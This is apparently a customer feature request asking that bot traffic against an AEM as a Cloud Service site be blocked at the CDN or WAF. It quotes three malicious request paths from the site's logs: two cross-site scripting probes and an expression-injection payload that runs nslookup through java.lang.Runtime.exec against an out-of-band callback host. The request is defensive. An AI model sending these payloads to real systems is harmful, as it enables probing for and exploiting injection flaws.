| Request for Feature Enhancement (RFE) Summary: |
Would like to add the following feature: Block some known Bot Requests by IP in CDN in AEMaaCS.
Ignoring URL Parameters at CDN is currently not possible.
|
| Use-case: |
We are getting a lot of Bot Requests in our Dispatcher and Publish Logs.
Ideally we would like to block these requests at CDN itself.
These requests are coming from multiple IP and are impacting the performance of the application.
Request Types -
1. /Solar_Image.php?mode=resize&fname=test%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
2./$%7b@java.lang.Runtime@getRuntime().exec(%22nslookup%20cec9ut6t9v7cv1g00010h8moeyzz4cmdk.oast.live%22)%7d/
3. /pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E
There should be a way to block the IP or perform the action at WAF layer to block these bots.
|
| Current/Experienced Behavior: |
The requests are blocked at Dispatcher currently but the logs are choked with these requests. |
| Improved/Expected Behavior: |
The requests get blocked at CDN by either IP or query parameters to avoid request flow to Dispatcher. |
| Environment Details (AEM version/service pack, any other specifics if applicable): |
AEMaaCS - Version - 2022.11.9850.20221116T162329Z-220900
|
| Customer-name/Organization name: |
TA Digital |
| Screenshot (if applicable): |
|
| Code package (if applicable): |
|
